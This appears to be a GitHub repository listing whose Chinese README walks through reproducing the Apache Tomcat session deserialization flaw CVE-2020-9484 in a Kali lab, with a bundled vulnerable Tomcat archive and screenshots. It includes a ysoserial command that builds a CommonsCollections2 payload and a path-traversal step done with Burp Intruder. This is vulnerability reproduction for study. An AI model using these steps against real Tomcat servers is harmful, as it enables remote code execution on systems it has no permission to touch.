├── README.md
├── apache-tomcat-7.0.61-CVE-2020-9484.tar.gz
└── img
    ├── intruder1.png
    ├── intruder2.png
    ├── ok.png
    ├── s2-053.png
    └── start.png


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2020-9484
 2 | 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484
 3 | ## 环境：
 4 | 1.	Kali 2.0
 5 | 2.	apache-tomcat-7.0.61-CVE-2020-9484.tar.gz（webapp是s2-053，在其lib下加了commons-collections4-4.0.jar）
 6 | <br><br>
 7 | ## 启动
 8 | /yourtomcatdir/bin/startup.sh
 9 | ![image](https://github.com/IdealDreamLast/CVE-2020-9484/blob/master/img/start.png)
10 | <br><br>
11 | ## 生成payload
12 | java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
13 | <br><br>
14 | ## 利用
15 | 
16 | 先访问S2-053看是否启动正常：
17 | http://192.168.152.128:8080/s2-053/
18 | ![image](https://github.com/IdealDreamLast/CVE-2020-9484/blob/master/img/s2-053.png)
19 | <br>
20 | 重新访问抓包，用intruder进行路径遍历
21 | ![image](https://github.com/IdealDreamLast/CVE-2020-9484/blob/master/img/intruder1.png)<br>
22 | ![image](https://github.com/IdealDreamLast/CVE-2020-9484/blob/master/img/intruder2.png)
23 | 
24 | <br>
25 | 
26 | 执行命令成功：
27 | ![image](https://github.com/IdealDreamLast/CVE-2020-9484/blob/master/img/ok.png)
28 | 
29 | <br>
30 | <br>
31 | Reference ：  https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg


--------------------------------------------------------------------------------
/apache-tomcat-7.0.61-CVE-2020-9484.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/apache-tomcat-7.0.61-CVE-2020-9484.tar.gz


--------------------------------------------------------------------------------
/img/intruder1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/img/intruder1.png


--------------------------------------------------------------------------------
/img/intruder2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/img/intruder2.png


--------------------------------------------------------------------------------
/img/ok.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/img/ok.png


--------------------------------------------------------------------------------
/img/s2-053.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/img/s2-053.png


--------------------------------------------------------------------------------
/img/start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IdealDreamLast/CVE-2020-9484/6f4a8f839cab39b1147117776681d81672291e7d/img/start.png


--------------------------------------------------------------------------------